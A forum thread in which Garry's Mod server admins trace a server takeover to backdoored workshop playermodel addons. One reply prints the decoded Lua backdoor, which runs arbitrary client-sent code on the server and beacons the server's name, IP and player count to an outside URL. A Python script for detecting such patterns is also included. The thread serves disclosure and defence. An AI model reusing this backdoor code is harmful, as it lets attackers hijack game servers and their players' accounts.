Hackers

So over the past few days things have gotten pretty bad on my deathrun server. Someone with playermodels on the workshop joined (they were added on my server) and was able to give himself superadmin and then give people points in the pointshop. I banned him, thinking, well, it must have been an exploit.

Since then, a lot of others have joined doing the same thing, except they would ban users too. When staff banned them it would just ban someone else in the server, and the hackers were able to rejoin like they weren’t banned at all. Some people were banned because staff were trying to ban the hackers. So basically at this point, they bypass bans, can give themselves ranks, can ban people, and access the pointshop.

I thought maybe it was an RCON exploit or whatever, so I disabled it and added something that bans you if you get the password wrong. I set sv_allowcslua to 0 and sv_allowupload/download to 0. I got all the IPs I could find and banned them, but for some reason the same one has joined back more than 3 times. Guess who it is? The guy from the Steam workshop. He used different names and accounts, all under the same IP. There are also a few other IPs involved. Also, a few of them used voice chat and had different voices, so it’s more than one person.

Well after all of my efforts they still were able to come on today and bypass bans.

I really do not know what to do. I have logs, IPs and Steam IDs, all banned, but they can still connect!

Please please help!

[editline]1st August 2014[/editline]

Also, when I banned the guy from the workshop he said to one of my admins “I admit I was trolling, gave myself admin using an exploit then tested to see if it worked by setting points :p”

[editline]1st August 2014[/editline]

Oh and one more thing, I have removed his models from my servers as well.

Take that guy’s workshop content off your server. I’m just guessing, but I wouldn’t be surprised if he coded exploits into his stuff.

This workshop addon, for example, has one.

If you’ve removed his stuff and it’s still happening, there’s probably something else that was added in as an exploit. I’d do a backup, then clear all of your addons out and basically reinstall the server and re-add them, minus that guy’s shit.

Should I say whose stuff did it so no one else is affected?

Where’s your rcon password set? In the server startup command or in server.cfg?

It was in server.cfg, but I deleted it so it just says rcon_password “” and I disabled rcon itself.

If it was in server.cfg when this was going on, they probably had rcon access.

Well I’ve deleted all the content and disabled rcon… so I guess I’ll just have to wait and see now.

I don’t think the exploit is being widely abused, it’s pretty unlikely that’s the cause.

I suspect the addons have an exploit, but I imagine it doesn’t help to leave the rcon pass there.

Some addons read the rcon password from the config. So true.

Install Microsoft Security Essentials and scan for possible trojans.

This works fine on my Windows Server 2008 and is free.

Regards.

What were the addons?

[editline]1st August 2014[/editline]

Random player models from Demonic King.

So not only does he reupload content without consent, he also places backdoors in them too. Very nice.

So he’s too lazy to change a few lua paths in his server so he uploads an outdated pack without asking anyone involved, but yet not lazy enough to plant exploits in his addons.

gg

Sorry about bumping this thread, but I actually looked through some of the addons at the request of op. I found this snippet of code tabbed way off to the right to avoid normal view range.

http://puu.sh/bdP5t/2426c1306e.lua (this one was formatted by a friend who couldn’t figure it out).

It looks like this is in most, if not all, of his playermodel addon scripts that come packaged with the models. I know nothing about coding so I can’t really translate it. Any chance we can get more info on this so we can at least make sure people don’t continue cramming his addons onto their servers?

I had nothing to do at the moment so I “decoded” the exploit:

if SERVER and game.IsDedicated() then
    local f = (function() end)      -- no-op used as the error handler and HTTP callbacks
    local c = CompileString         -- aliased so a casual grep for CompileString finds nothing
    local r = net.ReadString
    util.AddNetworkString("m9k_addons")
    -- any client message on this channel is compiled and executed as server-side Lua
    net.Receivers.m9k_addons = function()
        local s = c(r() or "--", "[C]", false)
        if type(s) ~= "string" then -- CompileString returns an error string on failure
            xpcall(s, f)
        end
    end
    -- 16 seconds after load, report hostname, IP and player count to the author's URL
    timer.Simple(16, function()
        http.Post("http://gmod.hints.me/", {
            hn = GetConVarString("hostname"),
            ip = GetConVarString("ip"),
            np = #player.GetAll()
        }, f, f)
    end)
end

It basically allows running arbitrary Lua code on dedicated servers and sends shitty statistics (server name/IP and number of players) to some URL.

People with addons on the workshop will put backdoors in their Lua files, and basically what they are doing is: if a player’s Steam ID == the creator of the addon, then set their usergroup to superadmin. They then have access to everything.
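An added example, not from this thread or any addon: an offline audit script a server host could run over an addon’s Lua files to flag the two patterns described here, the decoded net-handler-plus-CompileString backdoor (including code pushed far off-screen with tabs) and the SteamID-gated usergroup grant. The sample Lua, the placeholder SteamID and the MAX_INDENT threshold are constructed for the demo.

```python
import re

# Heuristic rules applied to each Lua source line of an addon.
RULES = [
    # source code compiled from a network payload (what the decoded snippet does)
    ("dynamic-exec", re.compile(r"\b(CompileString|RunString|RunStringEx)\s*\(")),
    ("net-handler", re.compile(r"\bnet\.(Receive\s*\(|Receivers\s*[.\[])")),
    # server hostname/IP beaconed to an outside URL
    ("http-beacon", re.compile(r"\bhttp\.(Post|Fetch)\s*\(")),
    # hardcoded SteamID test next to a usergroup change: the "author becomes superadmin" pattern
    ("steamid-check", re.compile(r"STEAM_[0-5]:[01]:\d+")),
    ("usergroup-set", re.compile(r"\bSetUserGroup\s*\(|\busergroup\s*=")),
]
MAX_INDENT = 40  # assumption: code indented this far is likely hidden off-screen

def scan_lua(source):
    """Return a list of (line_no, rule_name) findings for one Lua source string."""
    findings = []
    for n, line in enumerate(source.splitlines(), 1):
        indent = line[: len(line) - len(line.lstrip(" \t"))].expandtabs(4)
        if line.strip() and len(indent) >= MAX_INDENT:
            findings.append((n, "hidden-indent"))
        for name, rx in RULES:
            if rx.search(line):
                findings.append((n, name))
    return findings

def risk_score(findings):
    """Score a file: each distinct rule counts one; the two backdoor combinations
    (net handler feeding dynamic exec, SteamID gate next to a usergroup change)
    add a large bonus because together they are much stronger than either alone."""
    hits = {rule for _, rule in findings}
    score = len(hits)
    if {"dynamic-exec", "net-handler"} <= hits:
        score += 5
    if {"steamid-check", "usergroup-set"} <= hits:
        score += 5
    return score

# Constructed sample: benign line, two far-indented lines mirroring the decoded
# snippet, and a SteamID-gated rank grant with a placeholder SteamID.
SAMPLE = "\n".join([
    'hook.Add("Think", "x", function() end)',
    "\t" * 12 + 'net.Receivers.m9k_addons = function() local s = CompileString(net.ReadString() or "--", "[C]", false) end',
    "\t" * 12 + 'http.Post("http://example.invalid/", {hn = GetConVarString("hostname")}, f, f)',
    'if ply:SteamID() == "STEAM_0:1:00000000" then ply:SetUserGroup("superadmin") end',
])

if __name__ == "__main__":
    for line_no, rule in scan_lua(SAMPLE):
        print(f"line {line_no}: {rule}")
    print("risk score:", risk_score(scan_lua(SAMPLE)))
```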

I’m guessing those statistics are actually there so he knows what servers have the addon installed so he can go have his fun.

Unfortunately it’s a little more than that. Your average player (or server host) isn’t going to check every single addon for exploits, and this code isn’t just “hey, give me admin” but rather it’s been obfuscated and even hidden in a spot that’s obvious yet easy for some people to miss. In other words, he’s not setting himself as an admin for shits and giggles but rather he’s creating a backdoor that allows him to hop in, do whatever he wants, and freak the shit out of people who most likely have no idea what’s going on.

In any case, thanks for the help, mijyuoon. I’m not quite sure where to go from here yet, but I’ll figure it out.